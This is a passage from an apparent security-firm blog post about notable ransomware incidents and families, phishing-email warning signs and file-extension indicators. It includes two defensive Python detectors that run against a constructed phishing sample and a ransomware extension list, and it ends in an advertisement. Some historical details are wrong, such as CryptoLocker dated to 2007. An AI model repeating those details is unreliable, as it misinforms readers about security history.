The attackers identified a chain of vulnerabilities, ranging from improper authentication validation to SQL injection, in Kaseya’s on-premises VSA software, which organizations typically run in their DMZs. REvil then used the MSPs’ Remote Monitoring and Management (RMM) tools to push the attack out to all connected agents.

10. Accenture

The ransomware gang LockBit hit Accenture, the global tech consultancy, with an attack in August that resulted in a leak of over 2,000 stolen files. The slow leak suggests that Accenture did not pay the $50 million ransom.

According to CyberScoop, Accenture knew about the attack on July 30 but did not confirm the breach until August 11, after a CNBC reporter tweeted about it. CRN criticized the firm for its lack of transparency about the attack, saying that the incident was a “missed opportunity by an IT heavyweight” to help spread awareness about ransomware.
Bonus: CNA Financial (2021)

CNA Financial, the seventh largest commercial insurer in the United States, announced on March 23, 2021, that it had “experienced a sophisticated cybersecurity attack.” Phoenix Locker ransomware was used in the attack, which was carried out by a group called Phoenix.

CNA Financial paid $40 million in May 2021 to regain access to the data. While CNA has been tight-lipped about the specifics of the negotiation and sale, it claims that all of its systems have been fully restored since then.
Types of ransomware:

There are two main types of ransomware:

  1. Crypto Ransomware

    Crypto ransomware encrypts files on a computer so the user cannot access them.

  2. Locker Ransomware

    Locker ransomware does not encrypt files. Instead, it locks the victim out of their device, preventing them from using it. Once the victim is locked out, the cybercriminals behind the attack demand a ransom to unlock the device.

Now you understand what ransomware is and the two main types of ransomware that exist. Let’s explore 10 types of ransomware attacks to help you understand how different and dangerous each type can be.

  • Locky

    Locky is a type of ransomware that was first released in a 2016 attack by an organized group of hackers. With the ability to encrypt over 160 file types, Locky spreads by tricking victims into installing it via fake emails with infected attachments. This method of transmission is called phishing, a form of social engineering. Locky targets a range of file types that are often used by designers, developers, engineers, and testers.

  • WannaCry

    WannaCry is a ransomware attack that spread across 150 countries in 2017. Designed to exploit a vulnerability in Windows, it was allegedly created by the United States National Security Agency and leaked by the Shadow Brokers group. WannaCry affected 230,000 computers globally. The attack hit a third of hospital trusts in the UK, costing the NHS an estimated £92 million. Users were locked out and a ransom was demanded in the form of Bitcoin. The attack highlighted the problematic use of outdated systems, leaving the vital health service vulnerable to attack. The global financial impact of WannaCry was substantial: the cybercrime caused an estimated $4 billion in financial losses worldwide.

  • Bad Rabbit

    Bad Rabbit is a 2017 ransomware attack that spread using a method called a ‘drive-by’ attack, where insecure websites are targeted and used to carry out an attack. During a drive-by ransomware attack, a user visits a legitimate website, not knowing that it has been compromised by a hacker. Drive-by attacks often require no action from the victim beyond browsing the compromised page. In this case, however, victims were infected when they clicked to install something that was malware in disguise. This element is known as a malware dropper. Bad Rabbit used a fake request to install Adobe Flash as a malware dropper to spread its infection.

  • Ryuk

    Ryuk, which spread in August 2018, disabled the Windows System Restore option, making it impossible to restore encrypted files without a backup. Ryuk also encrypted network drives. The effects were crippling, and many organizations targeted in the US paid the demanded ransoms. August 2018 reports estimated funds raised from the attack were over $640,000.

  • Troldesh

    The Troldesh ransomware attack happened in 2015 and was spread via spam emails with infected links or attachments. Interestingly, the Troldesh attackers communicated with victims directly over email to demand ransoms. The cybercriminals even negotiated discounts for victims with whom they had built a rapport, a rare occurrence indeed. This tale is the exception, not the rule. It is never a good idea to negotiate with cybercriminals. Avoid paying the demanded ransom at all costs, as doing so only encourages this form of cybercrime.

  • Jigsaw

    Jigsaw is a ransomware attack that started in 2016. This attack got its name as it featured an image of the puppet from the Saw film franchise. Jigsaw gradually deleted more of the victim’s files each hour that the ransom demand was left unpaid. The use of horror movie imagery in this attack caused victims additional distress.

  • CryptoLocker

    CryptoLocker is ransomware that was first seen in 2007 and spread through infected email attachments. Once on your computer, it searched for valuable files to encrypt and hold to ransom. CryptoLocker is thought to have affected around 500,000 computers. Law enforcement and security companies eventually managed to seize a worldwide network of hijacked home computers that was being used to spread CryptoLocker. This allowed them to control part of the criminal network and capture the data as it was being sent, without the criminals knowing. This action later led to the development of an online portal where victims could get a key to unlock and release their data for free, without paying the criminals.

  • Petya

    Petya (not to be confused with ExPetr) is a ransomware attack that first hit in 2016 and resurged in 2017 as GoldenEye. Rather than encrypting specific files, this vicious ransomware encrypts the victim’s entire hard drive. It does this by encrypting the primary file table, making it impossible to access files on the disk. Petya spread through HR departments via a fake job application email with an infected Dropbox link.

  • GoldenEye

    The resurgence of Petya, known as GoldenEye, led to a global ransomware attack that happened in 2017. Dubbed WannaCry’s ‘deadly sibling,’ GoldenEye hit over 2,000 targets, including prominent oil producers in Russia and several banks. Frighteningly, GoldenEye even forced workers at the Chernobyl nuclear plant to check radiation levels manually as they had been locked out of their Windows PCs.

  • GandCrab

    GandCrab is a notoriously unsavory ransomware attack that threatened to reveal the victim’s porn-watching habits. Claiming to have hijacked the user’s webcam, the GandCrab cybercriminals demanded a ransom, or otherwise they would make the embarrassing footage public. After first hitting in January 2018, GandCrab evolved into multiple versions. As part of the No More Ransom Initiative, internet security providers and the police collaborated to develop a ransomware decryptor to rescue victims’ sensitive data from GandCrab.

How to Spot a Ransomware Email

You now know about the various types of ransomware attacks that have been perpetrated against individuals and businesses in recent years. Many of the victims of the ransomware attacks we’ve mentioned became infected after clicking on links in spam or phishing emails or opening malicious attachments.

So, how can you avoid being a victim of a ransomware assault if you receive a ransomware email? Checking the sender is the easiest approach to recognizing a ransomware email. Is it from a reliable source? Always be cautious if you receive an email from someone or a firm you don’t recognize.

Never open email attachments from senders you don’t trust, and never click on links in emails from untrustworthy sources. If the attachment asks you to activate macros, proceed with caution. This is a popular method of ransomware distribution.
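The three checks above (who really sent it, what the attachment is, where the links go) can be applied mechanically before a message reaches a person. As an added example written for this article (not Protected Harbor’s code), the following Python analyzes a constructed raw message with the standard library’s email parser: it compares the From domain against a trusted-domain list and against Reply-To, flags macro-enabled Office and executable attachments by extension, and flags links whose visible text names one domain while the href points at a raw IP or a different host. The sample message, the trusted-domain set and the extension list are assumptions for the example.

```python
import email
import ipaddress
import os
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message for the example (not a real phishing sample).
SAMPLE_EMAIL = """\
From: "IT Helpdesk" <helpdesk@example-corp.com>
Reply-To: billing@mail-example-corp.co
To: user@example-corp.com
Subject: Invoice overdue
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>Please open the attached invoice or log in at the
<a href="http://198.51.100.5/login">example-corp.com portal</a>.</p>
--b1
Content-Type: application/octet-stream; name="invoice.docm"
Content-Disposition: attachment; filename="invoice.docm"
Content-Transfer-Encoding: base64

QUJD
--b1--
"""

# Macro-enabled Office formats and script/executable types (assumed list for the example).
RISKY_ATTACHMENT_EXTENSIONS = {".docm", ".xlsm", ".pptm", ".dotm", ".exe", ".js", ".vbs", ".scr", ".hta"}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def domain_of(header_value):
    """Lower-cased domain part of an address header, or '' if absent."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def analyze_email(raw, trusted_domains):
    """Return a list of warning strings; an empty list means no check fired."""
    msg = email.message_from_string(raw, policy=policy.default)
    flags = []

    # 1. Sender checks: unknown domain, or replies silently routed elsewhere.
    from_dom = domain_of(msg["From"])
    reply_dom = domain_of(msg["Reply-To"]) if msg["Reply-To"] else from_dom
    if from_dom not in trusted_domains:
        flags.append(f"sender-domain-not-trusted:{from_dom}")
    if reply_dom != from_dom:
        flags.append(f"reply-to-mismatch:{reply_dom}")

    # 2. Attachment checks: macro-enabled documents and executables by extension.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if os.path.splitext(name)[1].lower() in RISKY_ATTACHMENT_EXTENSIONS:
            flags.append(f"risky-attachment:{name}")

    # 3. Link checks: href host is a bare IP, or visible text names a different host.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = _LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            host = (urlparse(href).hostname or "").lower()
            try:
                ipaddress.ip_address(host)
                flags.append(f"link-to-raw-ip:{href}")
            except ValueError:
                pass
            if host and "." in text and host not in text.lower():
                flags.append(f"link-text-mismatch:{text}->{host}")
    return flags


if __name__ == "__main__":
    for flag in analyze_email(SAMPLE_EMAIL, {"example-corp.com"}):
        print(flag)
```

The checks are deliberately simple heuristics: a trusted From domain can still be spoofed, so in production the sender check belongs alongside SPF/DKIM/DMARC results from the receiving gateway, and the extension list should follow the organization’s own attachment policy.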
Using a Ransomware Decryptor

Do not pay a ransom if you are the victim of a ransomware attack. Paying the ransom demanded by cybercriminals does not guarantee that your data will be returned. After all, these are crooks. It also strengthens the ransomware industry, increasing the likelihood of future attacks. If your data is backed up externally or in cloud storage, you will be able to restore the data that is being held to ransom.
Types of Ransomware Extensions

Ransomware typically appends a particular file extension to the files it encrypts, so infected files can often be recognized by extensions such as those listed below:

.ecc, .ezz, .exx, .zzz, .xyz, .aaa, .abc, .ccc, .vvv, .xxx, .ttt, .micro, .encrypted, .locked, .crypto, _crypt, .crinf, .r5a, .XRNT, .XTBL, .crypt, .R16M01D05, .pzdc, .good, .LOL!, .OMG!, .RDM, .RRK, .encryptedRSA, .crjoker, .EnCiPhErEd, .LeChiffre, .keybtc@inbox_com, .0x0, .bleep, .1999, .vault, .HA3, .toxcrypt, .magic, .SUPERCRYPT, .CTBL, .CTB2, .locky or 6-7 length extension consisting of random characters
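A list like this is most useful when it drives a check rather than being read by eye. As an added example written for this article (not Protected Harbor’s tooling), the following Python classifies file names against the extensions above, also catching the “6-7 random characters” case the list mentions, and raises an alert when the share of renamed files in a listing crosses a threshold, which is what a sudden mass rename by crypto ransomware looks like from the file system’s side. The sample listing, the allowlist of legitimate six- and seven-letter extensions, the double-extension rule and the threshold are assumptions for the example.

```python
import os
import re

# Extensions from the list above, lower-cased; "_crypt" is a bare suffix rather than a dot extension.
KNOWN_RANSOMWARE_EXTENSIONS = {
    ".ecc", ".ezz", ".exx", ".zzz", ".xyz", ".aaa", ".abc", ".ccc", ".vvv", ".xxx",
    ".ttt", ".micro", ".encrypted", ".locked", ".crypto", ".crinf", ".r5a", ".xrnt",
    ".xtbl", ".crypt", ".r16m01d05", ".pzdc", ".good", ".lol!", ".omg!", ".rdm", ".rrk",
    ".encryptedrsa", ".crjoker", ".enciphered", ".lechiffre", ".keybtc@inbox_com",
    ".0x0", ".bleep", ".1999", ".vault", ".ha3", ".toxcrypt", ".magic", ".supercrypt",
    ".ctbl", ".ctb2", ".locky",
}
KNOWN_RANSOMWARE_SUFFIXES = {"_crypt"}

# Six- or seven-character alphanumeric extensions match the "random characters" case.
# A small allowlist (assumed) keeps common legitimate extensions of that length quiet.
RANDOM_EXT_RE = re.compile(r"^\.[a-z0-9]{6,7}$")
LEGITIMATE_LONG_EXTENSIONS = {".sqlite", ".torrent", ".config", ".gradle", ".geojson"}

# Constructed directory listing for the example: four renamed files, four normal ones.
SAMPLE_LISTING = [
    "budget.xlsx.locky", "photo.jpg.crypt", "notes.txt.a9f3kq2", "report.docx_crypt",
    "song.mp3", "db.sqlite", "readme.txt", "app.config",
]


def classify_name(name):
    """Return a reason string if the file name looks ransomware-renamed, else None."""
    lower = name.lower()
    stem, ext = os.path.splitext(lower)
    if ext in KNOWN_RANSOMWARE_EXTENSIONS:
        return f"known-extension:{ext}"
    for suffix in KNOWN_RANSOMWARE_SUFFIXES:
        if lower.endswith(suffix):
            return f"known-suffix:{suffix}"
    if RANDOM_EXT_RE.match(ext) and ext not in LEGITIMATE_LONG_EXTENSIONS:
        # Treat a random-looking extension as suspicious only when the original
        # extension is still visible before it (e.g. "notes.txt.a9f3kq2"); this
        # double-extension rule is an assumption that trades recall for fewer false alarms.
        if os.path.splitext(stem)[1]:
            return f"random-extension:{ext}"
    return None


def scan_names(names, ratio_threshold=0.25):
    """Classify every name and alert when the suspicious share reaches the threshold."""
    suspicious = []
    for name in names:
        reason = classify_name(name)
        if reason:
            suspicious.append((name, reason))
    ratio = len(suspicious) / len(names) if names else 0.0
    return {"suspicious": suspicious, "ratio": ratio, "alert": ratio >= ratio_threshold}


if __name__ == "__main__":
    result = scan_names(SAMPLE_LISTING)
    for name, reason in result["suspicious"]:
        print(f"{reason:30} {name}")
    print(f"suspicious ratio={result['ratio']:.2f} alert={result['alert']}")
```

Because families change extensions constantly, the known list only catches yesterday’s ransomware; the ratio-based alert is what makes the check useful against a new family, and in practice it would run on file-system change events (many renames in a short window) rather than on a static listing.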

Go Phishing

With COVID-19 changing the way many businesses are forced to work, phishing attacks have increased significantly while becoming more complex. Hackers often look at crises as opportunities and COVID-19 is no different. Attackers are using names of coworkers and companies to fool people into thinking they’re legitimate emails. With many employees working from home and logging in, there is an increased reliance on remote system tools, and phishing scams have evolved to mimic them.

Stressful times are upon us and there is no letup in sight. As a result, IT staff are finding themselves overwhelmed as they address a multitude of system issues, software problems, and new problems stemming from employees working remotely. Many employees are using personal devices, which are more vulnerable to cyber-attacks. To be truly prepared for remote work and sophisticated threats, businesses need to analyze their weaknesses and implement proper cybersecurity approaches.

At PROTECTED HARBOR, we provide custom solutions to cyber-attacks, ransomware and other debilitating infrastructure issues. Our team of IT professionals ensures your infrastructure is secure through the creation and implementation of security policies. We analyze and remediate risks to keep you safe. On average, we save our clients up to 30% on IT costs while increasing their security, productivity, durability and sustainability. We are an extension of many IT departments, freeing them up to concentrate on daily work while we do the heavy infrastructure lifting.

Contact us today to find out more, www.protectedharbor.com